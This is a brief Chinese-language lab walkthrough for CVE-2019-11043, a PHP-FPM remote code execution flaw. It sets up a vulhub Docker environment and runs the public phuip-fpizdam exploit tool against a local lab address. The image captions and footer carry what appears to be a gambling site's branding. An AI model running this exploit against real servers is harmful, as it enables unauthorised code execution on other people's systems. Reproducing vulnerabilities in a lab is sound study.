CVE-2019-11043 PHP-FPM执行任意代码

0x00背景

在长亭科技举办的 Real World CTF 中,国外安全研究员 Andrew Danau 在解决一道 CTF 题目时发现,向目标服务器 URL 发送 %0a 符号时,服务返回异常,疑似存在漏洞。
在使用一些有错误的Nginx配置的情况下,通过恶意构造的数据包,即可让PHP-FPM执行任意代码。

0x01环境搭建
下载漏洞环境,使用docker搭建,漏洞环境地址https://github.com/vulhub/vulhub/blob/master/php/CVE-2019-11043,进入漏洞环境目录,执行docker-compose up -d命令,进行安装。

CVE-2019-11043 PHP-FPM执行任意代码-老子有钱娱乐官网

漏洞环境搭建成功,如图

CVE-2019-11043 PHP-FPM执行任意代码-老子有钱娱乐官网

0x02漏洞利用

在kali上配置好go环境,然后执行下面命令

go get github.com/neex/phuip-fpizdam
go install github.com/neex/phuip-fpizdam
./phuip-fpizdam http://192.168.175.135:8080/index.php

CVE-2019-11043 PHP-FPM执行任意代码-老子有钱娱乐官网CVE-2019-11043 PHP-FPM执行任意代码-老子有钱娱乐官网

0x03参考链接
https://github.com/neex/phuip-fpizdam
https://github.com/vulhub/vulhub/tree/master/php/CVE-2019-11043


长按识别关注老子有钱娱乐城微信公众号